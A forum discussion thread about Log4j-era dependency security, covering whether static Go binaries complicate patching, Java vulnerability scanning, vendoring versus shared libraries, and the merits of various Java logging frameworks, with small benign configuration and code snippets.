Afaik, the ELF format allows you to replace sections in a binary. The code (or data) is packed as "Sections" and mapped to memory locations. You use a tool to unpack the ELF sections and replace them. The application accesses those sections of memory and uses whatever ABI the application and library are designed to interact with. As long as you patch a section with the same ABI that an app/library used before, nobody will notice. And the ELF ABI never changes. But of course, not every system uses ELFs.

But all this depends on the compiler/linker/etc and how they generate sections and store them in the binary (for example, is it all compiled into one blob-section, or does it store libraries as separate sections, which might be inefficient?). I somehow doubt Go does things in such a way to allow this kind of patching. They probably generate a giant blob full of random functions and record versions in a header without the ability to extricate a whole library.


I'm not as familiar with Go... I do know that we use a dependency scan that looks at the docker images and recognizes vulnerable versions of various Java libraries.

With Go, can you look at a compiled binary in an image on the artifact repo and identify what libraries it used and if those libraries have vulnerabilities?

(and it appears that my question was answered in a sibling comment)


Java's "statically link then scan" approach doesn't really work though. (Some sibling threads explain why.)

Even Linux distributions where rebuilding the world is easy (like Debian) insist on breaking dependencies out into shared libraries, since tracking ad hoc vendored dependencies is just too difficult.

For example, sometimes people play dynamic loading and renaming tricks to allow multiple versions of the same Java library to coexist. That can usually be detected by vulnerability scanners, but not always.


I'm not sure what you mean by "statically link then scan" in the Java context. The fingerprints of the vulnerable class files are the same no matter where they are stored. They could be bundled together, or shoved in a fat jar, or exploded into all their classes -- but the class file is always distinct and identifiable.


What if the project recompiled them from source with some other version of javac, and prepended "My" to each class name?


I am not familiar with any project that goes through such extremes to avoid vulnerability scanners.

I am also not aware of any Java developers who build 3rd party libraries from source and avoid using maven (or gradle, or the odd one with ivy).

Your "what if..." doesn't describe any workflow that I have ever experienced with Java in a professional (and even hobbyist) context.


I think OP is basically describing shading, which is actually quite common.

https://maven.apache.org/plugins/maven-shade-plugin/
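For reference: plain shading just bundles the dependency's classes into your jar, but with a relocation stanza it also rewrites their package names, which is what tends to confuse naive scanners. A sketch with illustrative coordinates:

  <plugin>
    <groupId>org.apache.maven.plugins</groupId>
    <artifactId>maven-shade-plugin</artifactId>
    <executions>
      <execution>
        <phase>package</phase>
        <goals><goal>shade</goal></goals>
        <configuration>
          <relocations>
            <relocation>
              <pattern>io.netty</pattern>
              <shadedPattern>com.example.shaded.io.netty</shadedPattern>
            </relocation>
          </relocations>
        </configuration>
      </execution>
    </executions>
  </plugin>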


That leaves the original class file intact. Dependency vulnerability scanners can then identify the class file that is problematic.

I have exploded war deployments ( https://www.jrebel.com/learn/what-exploded-and-packaged-depl... ) put in a Tomcat image and the scanner is able to identify the libraries that the classes came from and their vulnerabilities.

I've also got fat jars for Spring Boot batch jobs that are single jars with all of the dependencies packaged in them, for ease of copying a single thing around on the server... and the dependency checker is able to identify issues there too, based on fingerprints of individual class files.

These work on the "you downloaded this from a known package management server" model. As long as you are using Maven to download the dependencies, a vulnerability checker will be able to identify them. One built into Maven ( https://owasp.org/www-project-dependency-check/ // https://jeremylong.github.io/DependencyCheck/dependency-chec... ) will be able to catch these as part of the build itself - irrespective of the shading of the final artifact.

If you are building from source, and obscuring the class names - yes, you can foil an external vulnerability checker (and since you're doing it from source, you are also not downloading it and thus avoiding a maven plugin use)... however, I don't know any projects that go through such lengths to compile 3rd party Java code themselves rather than using a jar, and are trying to evade vulnerability (and license) checkers.


Easy, just don't write bugs. /s

That said, I think this is missing the full picture - we have the same problem further down the stack, at the OS level, where old machines are running without receiving security updates on a regular basis.

I don't know that there's really much of a good answer to the problem short of "don't leave your children unattended". Unlike real kids and the real world, there's plenty of bad actors looking for unattended services to stab.


I also like how "single file deployment" is considered a feature. It makes things easier for people without proper packaging and distribution tools. Of course, these people without packaging and distribution tools will now have a hard time finding everywhere they have copied these binaries to.


packageblabla-1.2.3.deb is a single file.


That will only work on Debian. And that "single file" also requires the libfoo-1.5.deb file (must be >=1.5, not 1.4, and not higher than 2.0!) etc.


The thing about "single file deployment" is that it shouldn't have external requirements, otherwise it's not a single file deployment anymore.


... which is why the parent is (IMO correctly) claiming that the grandparent's assertion is incorrect that a Debian package is a "single file deployment".


I think both grandparent you’re referring to and its parent are lost in the woods.


Oh no, no I'm not, and the point of the joke was that a deb is as much of a single file as your compiled go thing. It's... well, it's a single file, it's a single artifact.

And yes, it has dependencies! So does your go file, I'm afraid.


> nearly every Go project in the world having to be patched and recompiled

Is that a particular problem? What's the difficulty with recompiling?


The advantage of being able to build to a binary is that you can then distribute the binary directly instead of distributing source and forcing people to rebuild it.

When 98% of your users only have the binary and not the source code it means 98% of your users won't even be aware that they need a new version that isn't vulnerable.

Remember the vulnerability disclosure will be something like "Log4Go has a vulnerability!!", not that the binary apps you've downloaded have a vulnerability. So if it affects 200 projects, every one of those projects will also have to publish vulnerability notifications independently.

And frankly 80% of those projects will likely be abandoned or at least neglected after a couple of years, leaving many people with vulnerable binaries they don't even know to check for vulnerabilities.

In other words, the very advantage of Go (easy to distribute binaries directly!) is a security disadvantage. If you instead installed the app using a package manager, the package manager could at least notify you that you have a package with a security issue. But that's nothing new; security and ease of use are often at odds.


Imagine you are a random person in charge of a computer. You hear there's this big vuln affecting Go programs.

1. How do I find out which programs on my system are Go programs? I have a lot of programs scattered all over. Someone will have to come up with a method (probably search through $PATH for files, run `strings` on it, grep for "Go", pray that's enough) to identify them.

2. They don't list a website, so I have to google the name of every program and find their website.

3. How do I tell which ones are affected by the vuln? I can hope their websites tell me, but maybe they're no longer maintained, or they haven't updated their READMEs.

4. If they don't provide a patched version (most probably won't), I might have to upgrade, which may break things (probably will), assuming they even have an upgradeable version that isn't affected.

5. If I can't upgrade and have to patch, am I even a software developer and know how to do that?

6. If I luckily happen to be one, what system compiled this app 8 years ago, with what dependencies, with what version of Go, etc? Can I recreate that system and learn their build tools to finally patch & recompile? (I am not a Go developer and it has taken me days to figure out how to get different Go programs to compile, for reasons I don't understand)

7. Once I apply the patch how do I test it? (Log4j had multiple iterations of patches/mitigations, some didn't work)

If I can't find the source code, can't upgrade it, & can't patch it, I am just stuck with a vulnerable version until I can somehow replace the program. For the programs I was able to identify as vulnerable, anyway.

Log4j was "easy" compared to this, because you could just find all the jars on your system and unzip them, find a file, replace it, zip it back up. Log4j was actually a nightmare though, and Go apps will be worse.


> How do I find out which programs on my system are Go programs?

Well how are these programs getting onto your system?

Presumably via some package manager, or an image builder?

Don't those manage the update for you?

If you're running code that you don't know who wrote, with no source code, that you can't patch, that nobody is taking responsibility for, then yeah you've got issues. But you had issues already if that's the predicament you're in. Some of this applies to Java too - obfuscation breaks the fixes you described using!


Most people download and install Go programs by hand, since they're statically compiled - that's their main selling point.

> If you're running code that you don't know who wrote, with no source code, that you can't patch, that nobody is taking responsibility for, then yeah you've got issues

25 million computers around the world still use Windows XP. It was launched 21 years ago, EOL 8 years ago. Very common actually, especially since most software in the world is not open source. People just keep using software that works.


> If you're running code that you don't know who wrote, with no source code, that you can't patch, that nobody is taking responsibility for, then yeah you've got issues.

This is the default state of affairs for nearly everyone who uses a computer.

We can either throw our hands up and futilely say "well they shouldn't do that!", or we can try to solve the problem.


> You hear there's this big vuln affecting Go programs.

This isn't relevant. What's relevant is if any of the specific programs I am responsible for have a vulnerability. If so, I need to update those specific programs. The notion of implementation language, shared library, dependency, these are all abstraction leaks. The atomic unit of responsibility, at the machine level, is program/service.


I think that's the parent's point. The hypothetical big announcement that this hypothetical "Log4Go" library has a vulnerability will not include a comprehensive list of all applications that use the library, so then we have to hope that the developers of every single application that uses Log4Go hears about the vulnerability, updates their software, makes a new release, and then notifies all their users somehow.

Alternatively, a more-savvy user has to hear about this Log4Go vulnerability and see if any of their applications use it and might need an update (which might involve contacting the maintainer to inform them that they need to update their software). But the vast majority of users aren't even going to hear about the Log4Go vulnerability, let alone understand what it means or what they need to do to protect themselves.

The safest thing would be for every application to dynamically link to a system-provided version of Log4Go, and OS maintainers would be the ones to send out an update via their OS's auto-update service. This does create other problems, but at least they are problems that technically-unsophisticated users do not need to solve or concern themselves with.

(Of course, there is no mechanism to do this with Go modules, so the entire thing is moot.)

This is why I get annoyed when developers say "I have to vendor library X into my application, because I'm afraid that the system copy will get updated to a version that breaks my app". Well then, maybe you shouldn't use a library whose author can't abide by semver and provide a reasonably-strong promise that minor and patch version updates won't break things. Otherwise you are just outsourcing your problems to your users.


> The hypothetical big announcement that this hypothetical "Log4Go" library has a vulnerability will not include a comprehensive list of all applications that use the library,

Nor should it. A dependency should be encapsulated by its consumers. A vulnerability that leaks to the consumer application is a bug in the consumer application.

> The safest thing would be for every application to dynamically link to a system-provided version of Log4Go,

Unfortunately this means that any application which uses Log4Go cannot make any definitive assertions about the specific code which is executed by their distributed artifact. This is a problem, and the cost of this problem is far higher than the benefits conveyed by dynamic linking. The future of application distribution is absolutely static linking.

> "I have to vendor library X into my application, because I'm afraid that the system copy will get updated to a version that breaks my app". Well then, maybe you shouldn't use a library whose author can't abide by semver and provide a reasonably-strong promise that minor and patch version updates won't break things. Otherwise you are just outsourcing your problems to your users.

As a software producer, it should not be possible for a dependency to impact my users without my knowledge.

It is infeasible to rely on any specific level of versioning stability from my dependencies. Every dependency I adopt represents a risk which I am taking on.


It's not a question of bundling / static builds, it's a question of dependencies and updates. If you build a static binary from maintained inputs (say, nix, Gentoo+portage, whatever) in CI and automatically distribute it, you're golden. If you completely separate a library out and... heck, make the user supply their own copy! but don't monitor it for updates, don't notify users, don't ship patches ever, then you're in a bad spot. Static/dynamic isn't the issue.


The beauty of the unbundled approach is, though, that you don't need to rebuild anything except the vulnerable thing. It scales. Having to rebuild the whole world, not so much, even if you can do it. Maybe you have access to an infinite supply of zero-cost energy, but I don't, and neither does the world at large.

When they find a critical bug in a Go module or a Rust crate, you usually end up with a litany of packages that had to be updated as well because everyone and their crab relies on that crate/module.

Count in release managers (or whatever that's called at your shop) who pin all dependencies to the most exact minor version before shipping, because they have learned to do it like a mantra without actually understanding all the "whys" of it and just keep religiously applying that hammer everywhere.

People keep complaining about how distributions work and how the traditional package management sucks all the time (of thousands complaining, I estimate that maybe 20 people actually know what they are talking about and thus are qualified to whine), but they somehow keep forgetting that those tools exist for a reason and that they are about to rediscover it the hard way. Chesterton's fence and all that.


Surprised nobody mentioned yet: reload4j https://reload4j.qos.ch/

It's a fork of log4j 1.2.17 by the original author that fixes a boatload of issues with 1.2.x and is a drop-in replacement for log4j. Very useful if you can't upgrade to log4j 2.x.


I never understood where log4j 2 was supposed to fit in the ecosystem.

* We had log4j 1, which was good enough for most use cases and everywhere.

* We had slf4j/logback, which was from the same authors, and broke backward compatibility but gave us a fundamentally better design.

* We had java.util.logging, which while braindead was builtin to Java and hence available everywhere.

* We had commons logging, which was never supposed to escape from tomcat, but got overused everywhere anyway.

All of this was more logging frameworks than was healthy for 1 language, and there are some more smaller ones.

Then apache decides to put new people on log4j, do a backward incompatible v2 design that nevertheless is worse than slf4j. Why?


> Then apache decides to put new people on log4j, do a backward incompatible v2 design that nevertheless is worse than slf4j. Why?

slf4j itself isn't a logging framework. It's a facade to logging frameworks.

Simple Logging Facade for Java ( https://www.slf4j.org )

It needs a logging framework behind it - log4j, log4j2, logback, commons, JUL.
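In code, using the facade looks like this (illustrative class names): the application only ever touches the slf4j API, and whichever backend binding is on the classpath does the actual writing.

  import org.slf4j.Logger;
  import org.slf4j.LoggerFactory;

  class PaymentService {
      private static final Logger log = LoggerFactory.getLogger(PaymentService.class);

      void charge(String customerId) {
          log.info("charging customer {}", customerId);  // parameterized, backend-agnostic
      }
  }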

The question is "why do log4j2?"

Logback came from the log4j 1.x path ( https://logback.qos.ch )

Log4j2 has a lot of features that weren't present when the project started ( https://en.wikipedia.org/wiki/Log4j#Apache_Log4j_2 ).

There is a licensing difference between Logback (LGPL/EPL) and Log4j 2.x (Apache License 2.0).


> Log4j2 has a lot of features

Apache projects in general have this feature creep seeping into every single one of their products that I have used.

It's just hard to trust apache projects now.


> It needs a logging framework behind it - log4j

Minor nit: log4j doesn't implement the slf4j interface, though. If you do want log4j to do your logging, but use slf4j in your application, you need to include a "bridge" library that adapts slf4j to log4j. And, conversely, if you have dependencies that use log4j, but want things to end up going through your slf4j-supporting backend (say, logback), you need to exclude the "real" log4j jar and include a different library that implements log4j's interface and forwards calls to slf4j.


> Then apache decides to put new people on log4j, do a backward incompatible v2 design that nevertheless is worse than slf4j. Why?

Because the original Log4j author wanted to do his own thing for a Log4j successor (slf4j/logback), and the Apache Log4j maintainers also had ideas about a next-gen framework and wanted to do that.

That’s Open Source, everyone can do their own thing if they like, and some things will get adopted more than others. Log4j2 got the most adoption because they had the Log4j “brand” and the Apache backing and more company-backed(?) maintainers.

I don’t consider java.util.logging to be braindead. It can in principle be used as a logging facade like slf4j, but not too many do that, and Log4j 1 had come first and kept that momentum.

The real mistake was for Java to not have a standard logging API earlier. (It took six years after Java 1.0.)


I use java.util.logging in a few apps, to cut down on dependencies, and I consider it to be fairly braindead. The fundamentals are okay, to the extent that they are copies of log4j, but there are a bunch of little things that just aren't done right, like:

- logging methods taking arrays rather than varargs (this would be a trivial change!)

- there being no way to create a SimpleFormatter with a custom format in code other than setting a system property before creating it

- there being no Logger.getLogger overload which takes a class, only strings

At some point, I am going to write a little facade which wraps jul and fixes the papercuts, which feels like a very silly thing to be doing!
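A minimal sketch of what such a facade might look like (illustrative names, only smoothing over the varargs and getLogger(Class) papercuts above):

  import java.util.logging.Level;
  import java.util.logging.Logger;

  final class Log {
      private final Logger delegate;

      private Log(Logger delegate) { this.delegate = delegate; }

      // jul only offers getLogger(String); accept a Class and use its name.
      static Log of(Class<?> cls) {
          return new Log(Logger.getLogger(cls.getName()));
      }

      // jul's parameterized log methods take Object[]; expose varargs instead.
      // Placeholders are jul's usual MessageFormat style: {0}, {1}, ...
      void info(String msg, Object... params) {
          delegate.log(Level.INFO, msg, params);
      }

      void warn(String msg, Object... params) {
          delegate.log(Level.WARNING, msg, params);
      }
  }

  // Log.of(MyService.class).info("started in {0} ms", millis);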


Those are cosmetic issues, in my book. The basic architecture is sound.

In any serious application you will want to have a central logging wrapper anyway (I always use one), which automatically takes care of the varargs issue.

The implementation of SimpleFormatter is 30 lines that you can easily copy and adjust as needed, including with your own custom format.

Regarding logger names, I always define an explicit set of logger names for the application, because that makes the logger names independent from implementation-detail subpackages, and any operations-side log filtering based on logger names will remain stable, regardless of how you refactor your implementation into Java packages. Basically, I see the logger names as part of the external interface of the application, and therefore I want to have them decoupled from the internal package structure, so that mere refactorings don't break that interface. You can still easily find all program locations that log to a specific logger, for example by Find Usages on the respective static Logger constant.


- the console appender writes to stderr.


java.util.logging was braindead because it wanted to know the class and method doing the logging. If not provided, it threw and caught an exception and filtered the stack trace to detect its own caller. Throwing an exception was a very slow operation.

I see they did some optimizations to do this work lazily if needed. But when log4j 1 was at its peak, that wasn't done, and using the built-in logger was slow enough to have a measurable impact.

See https://github.com/openjdk/jdk/blob/6765f902505fbdd02f25b599... at the bottom.


Hearing logging library and next-gen framework in the same sentence would never not make me laugh.


Log4j2 does have some legitimate improvements over Logback. These days you don't need anything fancy: just spew logs to stdout and something will capture them into your ELK, so those loggers do seem obsolete. Java needs standard logging with slightly improved ergonomics, and that's about it.


Yes, Java logging is ridiculously complicated for largely historical concerns that just don't make much sense in 2022.

Like what you most likely need is a wrapper for System.out that maybe does some clever buffering and backpressure management, but the rest is sensibly managed outside of the application; whether by logrotate, ELK, or whatever.

Long story short, no modern Java logging framework has any sensible reason to be much longer than a few hundred lines of code.
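
As a toy sketch of that shape (not a recommendation of any particular API, and the names are made up):

    import java.io.BufferedWriter;
    import java.io.OutputStreamWriter;
    import java.io.PrintWriter;
    import java.nio.charset.StandardCharsets;
    import java.time.Instant;

    // Timestamped, level-prefixed lines straight to stdout; rotation and
    // shipping are left to logrotate, the container runtime, or the ELK agent.
    public final class StdoutLog {
        private static final PrintWriter OUT = new PrintWriter(new BufferedWriter(
                new OutputStreamWriter(System.out, StandardCharsets.UTF_8), 64 * 1024));

        public static synchronized void log(String level, String msg) {
            OUT.printf("%s %s %s%n", Instant.now(), level, msg);
            OUT.flush(); // per-line flush keeps it simple; batching is the "clever buffering" part
        }

        public static void info(String msg) { log("INFO", msg); }
        public static void error(String msg) { log("ERROR", msg); }
    }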


I don't 100% agree with this, because even when you're doing containers and just dumping your log output to stdout, you still might be shipping that to a log aggregation system that will work a lot better with structured logging. So you might want to output JSON or some other structured format, and you might want your logger to support tagging, markers, stuff like that.

Even then, of course, this kind of logging should be able to be done in far fewer lines than most Java logging frameworks.


> Java needs standard logging with slightly improved ergonomics

That's exactly what JDK9+ java.lang.System.Logger is. See https://stackoverflow.com/questions/59976828/difference-betw...
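
Minimal usage looks roughly like this (the class is just an example):

    import java.lang.System.Logger;
    import java.lang.System.Logger.Level;

    // JDK 9+ System.Logger facade. By default it logs through
    // java.util.logging; another backend can be plugged in by providing a
    // System.LoggerFinder implementation.
    public class Demo {
        private static final Logger LOG = System.getLogger(Demo.class.getName());

        public static void main(String[] args) {
            // Parameters use MessageFormat-style {0} placeholders
            LOG.log(Level.INFO, "started with {0} argument(s)", args.length);
        }
    }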


It seems to be mainly intended for use internally in the JDK, though. From the JEP[1]: "It is not a goal to define a general-purpose interface for logging. The service interface contains only the minimal set of methods that the JDK needs for its own usage."

And from the motivation section: "The proposed service enables applications to configure the JDK to use the same logging framework as the application: It would only need to provide an implementation of the service that returns platform loggers that wrap the loggers of the preferred logging framework."

[1] https://openjdk.org/jeps/264


Oh, thank you! Learned something today. Plus a lesson to rely less on tech blogs and RTFM more!


> Welcome to how we use open source code. That’s a big reason Software Bills of Materials (SBOM) have become essential for securing the software supply chain.

I tend to do this, but it's pretty damn easy for me. I have a "2-level-dependency" rule that I generally go by these days; i.e., each dependency can have only one dependency, and that dependency can't have any others.

The main way that I deal with it is to write all my own dependencies, and I don't count toolsets, standard libraries, or platform frameworks (for better, or for ill).

I really, really want dependencies to work. They are a great idea, and I have been promoting modular architecture for decades.

It's just that we are in a "wild west" situation, where we can't trust dependencies.

I'm tired of hearing the phrase "It's a solved problem," with a reference to a dependency.

I don't have the answer. I just have my own rule, which elicits scorn from most modern programmers (I'm painted as a luddite, refusing to "get with the times," or as a "tinfoil-hatter").

WFM. YMMV.


I like the "2-level-dependency" rule, but what do you do when one of your dependencies gains more dependencies? Do you stop updating and start migrating to something else, or maybe maintain a fork of your own?

It's a very nice concept, but I kind of have my doubts about maintainability.


I use my own dependencies. I've written many of them. Some of them go "deeper," but only in dependencies that I authored.

Here's the dependency manifest from the app I'm working on now (From my localization file):

    // MARK: -
    // MARK: - DO NOT TRANSLATE BELOW THIS LINE -
    // MARK: -
    "SLUG-VERSION-BMLT"                             =   "BMLTiOSLib: 1.4.2";
    "SLUG-VERSION-KEYCHAINSWIFT"                    =   "KeychainSwift: 20.0.0";
    "SLUG-VERSION-LGVCLEANTIME"                     =   "LGV_Cleantime: 1.3.5";
    "SLUG-VERSION-UICLEANTIME"                      =   "LGV_UICleantime: 1.1.1";
    "SLUG-VERSION-AUTOFILL"                         =   "RVS_AutofillTextField: 1.3.0";
    "SLUG-VERSION-GCD"                              =   "RVS_BasicGCDTimer: 1.5.0";
    "SLUG-VERSION-CHECKBOX"                         =   "RVS_Checkbox: 1.2.0";
    "SLUG-VERSION-OBSERVER"                         =   "RVS_GeneralObserver: 1.1.0";
    "SLUG-VERSION-GST"                              =   "RVS_Generic_Swift_Toolbox: 1.10.1";
    "SLUG-VERSION-MB"                               =   "RVS_MaskButton: 1.2.0";
    "SLUG-VERSION-PP"                               =   "RVS_Persistent_Prefs: 1.3.1";
    "SLUG-VERSION-UKT"                              =   "RVS_UIKit_Toolbox: 1.1.5";
    "SLUG-VERSION-WHITEDRAGON"                      =   "White Dragon SDK: 3.2.2";

The only one of those that I didn't write was KeychainSwift[0]. It makes dealing with the Keychain easy, and is a very simple dependency. If it went off the rails, I'd write something like it, myself.

All the others, are in my own repos, as top-shelf-quality open-source modules.

[0] https://github.com/evgenyneu/keychain-swift


The problem I have with adopting something like this is that (other than the added time it would take to write and maintain all my own dependencies), I don't trust myself to avoid writing the same kinds of security bugs that a third-party dependency might also write. But those bugs are much more likely to be discovered and fixed in the widely-used third-party library than in my bespoke library, even if I publish that library as open source.

Sure, I would never write these log4j security-related bugs, because I would never even think to write such obscure functionality into a logging library for my own use.

Regardless: frankly, I think anyone who claims they won't write security bugs... well, that kind of person is probably a bit unrealistic about the flawlessness of their own abilities, to put it as politely as possible.


I don't claim to "never write security bugs."

However, it appears that the norm in the industry is to write lash-up code, as quickly as possible, in the hopes of an MVP that will get bought up by a FAANG.

And I am doubtful that most OSS actually gets all that "other eyeballs vetting" that everyone talks about. Most folks that I know, that use a lot of these dependencies, would be unable to understand what goes on in them, let alone offer fixes.

In fact, I remember a founder, on this very forum, declare that "If you don't get physically sick, looking at your MVP code, then you are spending too much time on code quality."

That posture doesn't exactly inspire confidence. I'm pretty good at what I do, and I tend to "overengineer" my security-related stuff, because I don't really have huge confidence in that. It's not my forte.

But writing good code is something that I can do.

Like I said, WFM. YMMV.


> I don't claim to "never write security bugs."

Sorry if I gave that impression; I wasn't trying to put those words in your mouth.

> And I am doubtful that most OSS actually gets all that "other eyeballs vetting" that everyone talks about.

Agreed, but a reasonably popular OSS project has a much higher chance of getting that vetting (or any vetting at all, really) than a bespoke library that the public never sees. The chances are a little higher for a niche / little-used bespoke library that you end up putting on GitHub or wherever, but they're still pretty low.

> In fact, I remember a founder, on this very forum, declare that "If you don't get physically sick, looking at your MVP code, then you are spending too much time on code quality."

I would never want to work for such a founder. I get the tension between getting an MVP out before you run out of money, but experience shows that prototype code ends up living in production a lot longer than anyone plans for. And I've personally seen those prototypes cause 6 and 7 figures of damage to a company later, when they haven't been properly replaced or at least improved when they should have been.

I'm glad what you're doing works for you (you sound like you probably actually are an above-average developer, unlike -- by definition -- most people), but I don't think I could in good conscience recommend your approach as a general practice.


> I don't think I could in good conscience recommend your approach as a general practice.

I can live with that, but ... (There's always a "but").

I am not happy at all, with the general industry practice of writing every project to be something that can be understood by inexperienced, undisciplined coders.

Every language and programming methodology has an "advanced" type of thing, requiring people to have experience and/or book-larnin'.

I write Swift at a fairly advanced level. I am not at the level of some heavy-duty advanced Swift people, but I am pretty "idiomatic," in my approach. It is not "rewritten TypeScript," like so much code out there.

My code is very well-documented, and I hold myself to standards of Quality that most folks in the industry consider to be obsessive to the point of insanity. My testing code usually dwarfs my implementation code, and my documentation is, let's say ... complete. You can see what I mean in my latest module[0].

The fact that so many folks have so much scorn for my posture and approach, tells me pretty much all I need to know. My values are not in sync with the prevailing industry values. I guess that I'm an "anomaly." I can live with that, as well.

I won't write junk, so that someone used to junk, can comprehend it. If people aren't willing to learn enough to understand my middle-of-the-road semi-advanced Swift, then I can't help them. Swift is an awesome language. I feel that we are doing ourselves a disservice, if we do not explore it.

I write for myself. I write code and documentation that I want to use (and I use it). I really don't care, whether or not someone else "approves" of it. I am not relying on others to review, maintain, or patch my code.

When I do use other people's code, I vet it fairly carefully. Including a dependency is a really serious matter. I'm handing full control of my execution context to code that someone else wrote. I'd damn well better take that Responsibility seriously.

[0] https://github.com/RiftValleySoftware/RVS_UIKit_Toolbox


As a small-time hobby / small-business server administrator (enthusiast), what's the best practice here?


If you want an extremely strong mitigating control that you can design into your architecture: allow internet egress in your production environment only to a list of domains/IPs on an allowlist, or control egress with an explicit proxy.

If vulnerable systems have no path to the internet at large then it's extremely difficult for attackers to know if a system is vulnerable to log4j and even harder to actually use it to exfiltrate data.


Every case is different... but for the log4shell case in particular:

* newer JVM versions protected against the main attack (JNDI), so if you were on any JDK version released in the last couple of years, you wouldn't be vulnerable.

* Java serialization filters [1], which are highly recommended to be set up in any Java application, would also have prevented the attacks.

* not including large libraries with lots of unused features could have prevented this. In this case, log4j has support for a dozen or so things that should've been opt-in (and I think they are now) but were enabled by default in every installation.

In summary: actually paying attention to possible attacks and ensuring you're defended against them, and reducing the surface area for attacks makes your application much safer.

[1] https://docs.oracle.com/javase/10/core/serialization-filteri...
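
For example, a process-wide deserialization filter (JEP 290, Java 9+) can be installed in a couple of lines; the allowed package below is just a placeholder:

    import java.io.ObjectInputFilter;

    // Allow only classes under a hypothetical com.example.model package,
    // cap object-graph depth and reference count, reject everything else.
    public final class SerialFilterSetup {
        public static void install() {
            ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
                    "maxdepth=10;maxrefs=1000;com.example.model.**;!*");
            ObjectInputFilter.Config.setSerialFilter(filter);
        }
    }
The same pattern can also be applied without code changes via the jdk.serialFilter system property.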


As an alternative / addition to the other suggestions, maintain an internal artifact store that syncs with upstream stores, but enforce that vulnerable versions aren't present. Block access to the upstream artifact stores so builds have to use the internal one.


Put a dependency check in your builds. Raise build errors when something is bad. Have it build on a regular basis (could be every month)... and then fix things.

https://owasp.org/www-project-dependency-check/

And some examples - https://jeremylong.github.io/DependencyCheck/dependency-chec...


Make sure you have the time to patch/update your applications when security issues are raised.


Whoa whoa whoa, slow down, that would mean somebody in the organization would have to spend _valuable senior developer time_ on reading things.

Yes, that's jaded, but that's what I'd expect. So far I've yet to feel like a job _encouraged me_ to pay attention to security updates, accessibility standards, or anything like that. And it's quite hard to keep myself motivated to do that, when it's pretty clear most software products are disposable anyway.


I hired a guy because he loves to be (technically) correct about everything, and he does so by reading (and REREADING) specs. Gives my team a superpower.


You can automate some of this. BlackDuck scans your dependencies (if you're using Maven or similar) to check what versions of dependencies you're using and if there are known CVEs for them. And there are plenty of competitors.

But you still need to patch and test when you find out there's an issue.


When are they going to release Log5j? Or even Log4k to address these issues?


The log4j author already did this about a decade ago. No one could understand log4j back then, so the replacement is much, much simpler, and API compatible for 99+% of use cases.

Few projects seem to have bothered moving to it, probably because log4j is such a colossal pain to set up or modify.


> No one could understand log4j back then

If you're scoffing at this, I want you to do an experiment. Imagine yourself at 26, when you just knew enough to be dangerous. Or as the person you're currently mentoring/would like to mentor. Now go into your application code, set a breakpoint on one of the moderately complex `logger.info()` calls, run your application and step into log4j. All the way down, until it writes to disk.

If you don't say "what the fuck" out loud at least once, you're a soulless monster and should go live in a cave.

If your application has a pretty good architecture, you may well discover that the code leading up to the `logger.info()` call is substantially less complex than the code below it. Just to write some text to the end of a single-writer file.

It chaps my ass that log4js, which claims specifically not to be a javascript port of log4j, has the same pattern of layers and weird indirection (some of which are avoided by monkey patching, which is in many respects even worse from a legibility standpoint, and absolutely from a discoverability standpoint). Much of this is chasing after not implementing the same 1 line function 6 times, which is made weirder by the fact that you have to write individual unit tests for each of the log levels, so you've already written 95% of the duplicated code.

Logging frameworks are a nearly canonical example of DRY as an antipattern.


> Few projects seem to have bothered moving to it, probably because log4j is such a colossal pain to set up or modify.

Every new project I see defaults to slf4j/logback.


I think Spring Boot defaults to Logback these days.


What is that replacement? java.util.logging?


I believe that replacement is Logback [1] + SLF4J, according to the intro section on Wikipedia's log4j article [2]

[1] https://logback.qos.ch/reasonsToSwitch.html

[2] https://en.wikipedia.org/wiki/Log4j


It's probable that there are more log4j-type exploits just waiting to be discovered. It's also becoming hard to tell which attacks come from private enterprises and which are state-sponsored.

It just seems like there's no solution. If Java is this bad, imagine how much more attack surface an npm-heavy project has. Not only that, the apparent hardware knowledge of state-sponsored attackers seems sophisticated enough to gain access at the vendor level, which forces us to question even the most trusted methodologies and dependency management.


It could be that npm libraries' obsession with only doing one thing will mean that they are less likely to get the sort of feature bloat that caused log4j's current misery.


We could learn to write auditably correct software.

Reflections on Trusting Trust explains why writing correct software is inadequate:

https://dl.acm.org/doi/10.1145/358198.358210


The dependencies are knowable in any software that is under development. But mitigations may be herculean.

My big question is, how can we exclude features we do not want? It seems foolish in retrospect to give your logger code-execution functionality on the server.

Where is my safeLog4j?


> seems like there's no solution

There is - don't depend on anybody else's software. It just means that software development will take longer and cost more.


But with the cost of rewriting everything that you are currently using through dozens of dependencies and third-party libs, you are going to go broke.

Unless you have a budget like the DOD, which I believe has its own coding language, you are ngmi.

Not to mention you would be introducing attack surfaces that won't have enough attention, because it's only being used by your team.

At least with a widely used lib, vulnerabilities are caught, published (very important), and constantly raising vigilance. Here you would have to perform your own threat mitigation and have bounty programs.


This assumes that your own software is more secure.


For what it's worth, the log4j vulnerability was due to some obscure feature that nobody uses. It's unlikely you'd even write such code.


I feel like if we as the open source community required commit signing, we would be in a safer position. Crypto signing doesn't block malware from being introduced, but it would make it harder to sneak under our noses.

Currently in open source, you really don't know where your code is coming from and who worked on it. Git's "commit author" fields don't require any proof of identity, that's what GPG is for.


I'm seeing this as well. While the amount of traffic has certainly decreased compared to the first couple of days after the CVE was announced, https://log4shell.tools is still being used by people every day.


That's what you get for not minding that a logging library needs over 300,000 lines of code.


At this point I'm asking if it is ok to go nuclear: just slap the AspectJ compiler in as the last step and patch the log4j remote logging API at compile time. Has anyone thought of this? Btw, who would use remote logging to begin with?


> Btw who would use remote logging to begin with?

It's not about remote logging like "we log to somewhere else" but rather about including information from remote sources (specifically JNDI) in your log messages. If you are ingesting logs from a bunch of microservices, it would obviously be desirable to know which instance you're in, and just include that in the logger pattern. Or if you have multiple containers in a single tomcat instance, you might want to have the log message include which container it's coming from (especially for the console). Multi-container tomcat used to be VERY common in pet-style legacy java deployments - it's much slimmer on memory, although it does come with the caveat that GC pauses affect all containers. But that container/server information isn't built into the jar, it's runtime data, and the easiest source for getting that information is... connecting to the tomcat server via JNDI and pulling instance information.

But oops, they populated the JNDI string values after the message was already built, meaning that any log message that included a JNDI handle would be executed automatically on its own. And JNDI is basically a whole inner-platform, including the ability to classload arbitrary code from remote sources, because "lol why not, it's java enterprise code, we're building the future here!", so basically any user-controlled log message could include a JNDI link to arbitrary code and it would be downloaded and run.

